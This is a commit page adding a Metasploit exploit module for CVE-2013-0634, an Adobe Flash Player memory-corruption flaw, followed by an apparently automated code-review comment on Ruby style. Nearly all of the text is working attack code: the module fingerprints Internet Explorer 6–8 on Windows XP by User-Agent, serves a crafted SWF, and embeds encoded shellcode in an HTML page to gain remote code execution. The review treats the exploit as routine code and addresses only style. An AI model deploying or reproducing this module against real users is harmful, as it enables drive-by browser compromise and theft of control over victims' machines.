Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption

bug/bundler_fix
dukeBarman 2014-01-18 11:07:11 -05:00
parent b43a221959
commit 766c408d86
2 changed files with 157 additions and 0 deletions

Binary file not shown.


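--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::HttpServer::HTML
+include Msf::Exploit::RopDb
+def initialize(info={})
+super(update_info(info,
+'Name' => "Adobe Flash Player 11.5 Remote Memory Corruption",
+'Description' => %q{
+This module exploits a vulnerability found in the ActiveX component of Adobe
+Flash Player before 11.5.502.149. By supplying a specially crafted swf file
+with special regex value, it is possible to trigger an
+memory corruption, which results in remote code execution under the context of the
+user. This vulnerability has also been exploited in the wild in February 2013.
+Please note in order to ensure reliability, the exploit is forced to modify
+your URIPATH parameter to less than 3 characters, which may cause possible
+URIPATH collisions.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Unknown', # malware sample
+'Boris "dukeBarman" Ryutin' # msf exploit
+],
+'References' =>
+[
+[ 'CVE', '2013-0634' ],
+[ 'OSVDB', '89936'],
+[ 'BID', '57787'],
+[ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
+[ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
+[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
+[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
+[ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
+],
+'Payload' =>
+{
+'Space' => 1024
+},
+'DefaultOptions' =>
+{
+'InitialAutoRunScript' => 'migrate -f',
+'EXITFUNC' => 'thread',
+'HTTP::compression' => 'gzip',
+'HTTP::chunked' => true,
+},
+'Platform' => 'win',
+'Targets' =>
+[
+[ 'Automatic', {} ],
+[ 'IE 6 on Windows XP SP3', {'Rop' => nil } ],
+[ 'IE 7 on Windows XP SP3', {'Rop' => nil } ],
+[ 'IE 8 on Windows XP SP3', {'Rop' => nil } ]
+],
+'Privileged' => false,
+'DisclosureDate' => "Feb 8 2013",
+'DefaultTarget' => 0))
+end
+def get_payload(t)
+p = payload.encoded
+return p
+end
+def get_target(agent)
+#If the user is already specified by the user, we'll just use that
+return target if target.name != 'Automatic'
+if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+return targets[1] #IE 6 on Windows XP SP3
+elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+return targets[2] #IE 7 on Windows XP SP3
+elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+return targets[3] #IE 8 on Windows XP SP3
+else
+return nil
+end
+end
+def on_request_uri(cli, request)
+agent = request.headers['User-Agent']
+my_target = get_target(agent)
+# Avoid the attack if the victim doesn't have the same setup we're targeting
+if my_target.nil?
+print_error("Browser not supported: #{agent}")
+send_not_found(cli)
+return
+end
+print_status("Target selected: #{my_target.name}")
+print_status("Client requesting: #{request.uri}")
+swf_uri = "/#{@resource_name}.swf"
+shellcode = get_payload(my_target).unpack("H*")[0]
+# The SWF request itself
+if request.uri =~ /\.swf$/
+print_status("Sending SWF")
+send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
+return
+end
+html = %Q|<html>
+<body>
+<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+<param name="movie" value="#{swf_uri}" />
+<param name="allowScriptAccess" value="always" />
+<param name="FlashVars" value="his=#{shellcode}" />
+<param name="Play" value="true" />
+</object>
+</body>
+</html>
+|
+html = html.gsub(/^ {4}/, '')
+print_status("Sending HTML")
+send_response(cli, html, {'Content-Type'=>'text/html'})
+end
+def primer
+hardcoded_uripath("/#{@resource_name}.swf")
+end
+def exploit
+@swf = create_swf
+@resource_name = Rex::Text.rand_text_alpha(5)
+vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")
+datastore['URIPATH'] = datastore['URIPATH'] || random_uri
+datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
+datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3
+print_warning("URIPATH set to #{datastore['URIPATH']}")
+super
+end
+def create_swf
+path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "Main.swf" )
+fd = ::File.open( path, "rb" )
+swf = fd.read(fd.stat.size)
+fd.close
+return swf
+end
+end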
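Review bot: In `create_swf` the descriptor returned by `::File.open( path, "rb" )` is never closed if `fd.read` raises, because the manual `fd.close` is not wrapped in `ensure`; the open/read/close triple can be replaced by `swf = ::File.binread(path)`, which reads the whole file and closes it on every path and also makes the explicit `return swf` unnecessary. `get_payload(t)` accepts a target it never reads and returns `p` through an explicit `return`, so either drop the parameter or add a comment saying it is kept for interface symmetry. `get_target` joins its user-agent checks with `and` rather than `&&`; the result is the same here, but `&&` is the idiomatic boolean operator and the form RuboCop expects. The `.swf` branch in `on_request_uri` tests `request.uri =~ /\.swf$/`, where `$` matches at any line end; `/\.swf\z/` anchors to the end of the string, and the same applies to `/^\//` in `exploit`, where `\A` is the whole-string anchor.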